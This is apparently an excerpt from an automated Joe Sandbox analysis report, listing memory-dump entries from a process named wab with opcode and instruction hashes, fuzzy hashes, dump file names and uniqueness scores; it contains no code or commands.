                                                          • Instruction ID: 39023c6351fb06e1cbf081c9e56b58387d2884817ea349e31d974c029a223365
                                                          • Opcode Fuzzy Hash: 33afb4b05e72fd754f0c8a10c765c7824c24fbeb31a1ce9be8b4832b86eb65b9
                                                          • Instruction Fuzzy Hash: 290169307011148BD702EE3DD89471A77D6EB8D720F508839E10ADB352DE3AED428794
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd8141035859cf8134b47b3d236d11b7f9a4fc2d93bf8af8c4d05b0579fb9fb5
                                                          • Instruction ID: 88b1b0aa3ea6aef92a1d04a60b4fad26ef35bc14d76d8eeb207662d559c60563
                                                          • Opcode Fuzzy Hash: dd8141035859cf8134b47b3d236d11b7f9a4fc2d93bf8af8c4d05b0579fb9fb5
                                                          • Instruction Fuzzy Hash: 2A01C871B10224ABDB649E75E84079E77BAFB89314F508439EB05EB341EB76B904CBC4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 085510c340a9b72688236f29d3dc70066847a9f239632517a2ed33bfaf248f4a
                                                          • Instruction ID: 2cd2b7c3730762a98678bdbc2352b655f0ff56d0d04ad848dcaa6d2d76ee3cb3
                                                          • Opcode Fuzzy Hash: 085510c340a9b72688236f29d3dc70066847a9f239632517a2ed33bfaf248f4a
                                                          • Instruction Fuzzy Hash: 91F0AF3579810287EBE01D6584097B6A65DDB06699F54F47BA602CE180FF7ACCC0C66A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$%$%$%$%$%$%$%$%$%$%$%
                                                          • API String ID: 0-1529166535
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$%$%$%$%$%$%$%$%$%
                                                          • API String ID: 0-4035151967
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$%$%$%$ p^
                                                          • API String ID: 0-2690488090
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%